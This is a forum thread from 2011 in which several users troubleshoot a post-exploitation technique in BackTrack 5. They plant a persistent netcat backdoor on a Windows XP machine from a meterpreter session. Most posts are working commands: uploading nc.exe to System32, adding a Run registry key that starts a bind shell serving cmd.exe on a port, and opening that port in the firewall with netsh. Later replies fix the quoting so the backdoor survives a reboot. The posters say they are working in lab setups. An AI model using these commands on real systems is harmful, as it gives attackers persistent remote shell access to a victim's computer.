Go Back   TechArena Community > Software > Operating Systems
Become a Member!
Forgot your username/password?
Tags Active Topics RSS Search Mark Forums Read

Sponsored Links



Backtrack 5- netcat/backdoor

Operating Systems


Reply
 
Thread Tools Search this Thread
  #1  
Old 21-06-2011
Edi Edi is offline
Member
 
Join Date: May 2011
Posts: 128
Backtrack 5- netcat/backdoor
  

Hello everyone I?m trying backtrack 5 kde version guides on upload netcat backdoor. That I have productively tested in backtrack 3 and backtrack 4 and that time it work. Now I have trouble in backtrack 5 my laboratory is backtrack 5 host, windows xp sp3 and virtual vista. When im obtains a meterpreter shell and running the command that time the whole thing look flawlessly but when I get call of netcat connection my connected refuses. My commands are as follows
Code:
*meterpreter> upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
*meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!
*meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!
Successful set CIAUZ.
*meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!

Reply With Quote
  #2  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 991
Re: Backtrack 5- netcat/backdoor

Reply 1
Next, we require modifying the system to permit remote connections all the way through the firewall to our netcat backdoor. For this:
Code:
meterpreter > execute -f cmd -i

Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents > netsh firewall show opmode
Netsh firewall show opmode

C:\Documents and Settings\Victim\My Documents > netsh firewall add portopening TCP 1111 "Service Firewall" ENABLE ALL

C:\Documents and Settings\Victim\My Documents > netsh firewall show portopening
Reply With Quote
  #3  
Old 21-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,035
Re: Backtrack 5- netcat/backdoor

So whenever you do netstat on the system you are "attacking" you will see netcat listening to this port 1111.netcat always doesn?t uses this port.in netcat you got option to provide the port number where u want your backdoor to run. Whenever u run netcat you?re backdoor must be there in his system taskbar. It must exist within C:\\WINDOWS\\SYSTEM32\\ wherever you upload it. If you check event viewer on the victim system where you can check the backdoor.
Reply With Quote
  #4  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 859
Re: Backtrack 5- netcat/backdoor

I?m happy: bt5 >xp sp3 virtual
Code:
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!!!
in the victim(xp) look in regedit:
CIAUZ REG_SZ C:WINDOWSsystem32nc.exe -L -d -p 1111 here is error!
i'm correctly with my hand dx :
CIAUZ REG_SZ C:\WINDOWS\system32\nc.exe -L -d -p 1111 IT'S WORK NOW
Reply With Quote
  #5  
Old 21-06-2011
Member
 
Join Date: Apr 2009
Posts: 967
Re: Backtrack 5- netcat/backdoor

All my firewall and antivirus are disabled! (router.host, virtual)! for my bad experience
I think the problem might be caused by Metasploit (meterpreter), because the command
Code:
reg setval -k HKLM\\Software\\Microsoft\\Windows\\Current Version \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"
But in victimpc nc.exe does not start automatically because it is a mistake to slash \ \ \ result: in the victim (xp) look in regedit:
Ciauz REG_SZ C: WINDOWSsystem32nc.exe-L-d-p 1111 error is here!
Reply With Quote
  #6  
Old 21-06-2011
Member
 
Join Date: May 2008
Posts: 2,676
Re: Backtrack 5- netcat/backdoor

I have been testing this as well. Using Backtrack 5 - 32bit - Gnome and the Victim machine is XP SP3 (Not Virtual).
I'm experiencing the similar thing as you absent \ from the registry value

Code:
"c:\windows\system32\nc.exe......."
I have noticed though, that if you set the registry key like this;

Code:
regsetval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run - backdoor -d C:\\Windows\\system32\\nc.exe
You will see the registry value is correct, c:\windows\system32\nc.exe
But as quickly as you use the " " to put up the spaces you lose the \ slashes. I will be keep playing with netcat.
Reply With Quote
  #7  
Old 21-06-2011
Member
 
Join Date: Apr 2010
Posts: 173
Re: Backtrack 5- netcat/backdoor

This is how I managed to get it to work on my setup;

Code:
reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v BACKDOOR -d C:\\Windows\\System32\\nc.exe" -ldp 4144 -e cmd.exe"
I just moved the position of the " " .Maybe this will work for you also.
Reply With Quote
  #8  
Old 21-06-2011
Member
 
Join Date: Nov 2009
Posts: 1,292
Re: Backtrack 5- netcat/backdoor

I will surely try this commands on my home pc once I reach home now im out. tonight I think all your command will work (maybe in my a variety of tests I ?have already used this kind of similar commands!) the actuality remains that years after you run the similar commands by heart by now you must now change! For my lack of experience seems to be a difficulty meterpreter shell. Above information was surely helpful.
Reply With Quote
Reply

  TechArena Community > Software > Operating Systems
Tags: , , , , , , , , , ,



Thread Tools Search this Thread
Search this Thread:

Advanced Search


Similar Threads for: "Backtrack 5- netcat/backdoor"
Thread Thread Starter Forum Replies Last Post
How to upgrade from Backtrack 4 to Backtrack 5 Upendra Operating Systems 6 09-07-2011 08:52 PM
How to fix BackDoor-DNW.dr virus Abbiey Networking & Security 4 21-04-2010 04:34 AM
Port redirection with Netcat spuff Networking & Security 5 10-03-2010 08:06 PM
Remove : BackDoor-CEP.gen Gavyn Networking & Security 4 04-02-2010 11:00 PM
How to remove BackDoor-DKI.gen.ba Sandy22 Networking & Security 5 31-12-2009 06:19 AM


All times are GMT +5.5. The time now is 01:57 PM.